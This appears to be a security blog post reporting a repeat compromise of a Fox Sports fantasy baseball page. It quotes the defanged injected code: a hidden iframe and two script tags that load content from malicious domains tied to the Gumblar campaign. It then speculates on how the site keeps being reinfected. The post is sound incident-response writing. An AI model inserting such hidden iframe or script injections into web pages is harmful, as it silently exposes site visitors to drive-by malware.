In October of 2009 the Fox Sports web site was found to have been compromised with an iframe that redirected visitors to a site hosting malicious content. The affected URL was hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external and an example of the injected code is below:
<iframe src=”hxxp://thingre.com/in.php” width=”1″ height=”1″ style=”visibility:hidden;position:absolute”></iframe>
Anyone who accessed this site while the malicious code was active could potentially have had their computer infected with malware. Fox Sports administrators eventually removed the iframe, but today the same page was infected again. This time the below two script tags were injected:
<script src=hxxp://akcworld.com/genco/fusion-request-a-password.php ></script><body topmargin=”0″ leftmargin=”0″ marginheight=”0″ marginwidth=”0″>
and
<script src=’hxxp://nt002.cn/E/J.JS’></script>
These same two scripts were also used in the October Fox Sports web site compromise incident. The akcworld.com and nt002.cn domains are widely known to host malicious content and are frequently used as part of the Gumblar campaign. At approximately 9:50pm I checked the Fox Sports web site to verify if the page was still infected. It was not. I then checked the page information and saw that it had been modified at 9:39pm EST, just 10 minutes before I checked the site.
The Fox Sports administrators moved very quickly this time to rectify the site compared to the October incident which nearly two weeks to address. However, this situation obviously begs the question how the Fox Sports web site keeps being compromised. I can think of several possibilities that would explain how this could occur: 1) The hackers installed a backdoor that they continue to use for access 2) The hackers continue to use compromised credentials to the web site 3) A vulnerability exists in the web site that has not been remediated 4) Fox Sports administrators restored an older version of the page that included the malicious code from the October hack. We won’t likely learn the root cause of this compromise any time soon, but it is certain that unless Fox Sports takes preventative action, it will probably occur again.
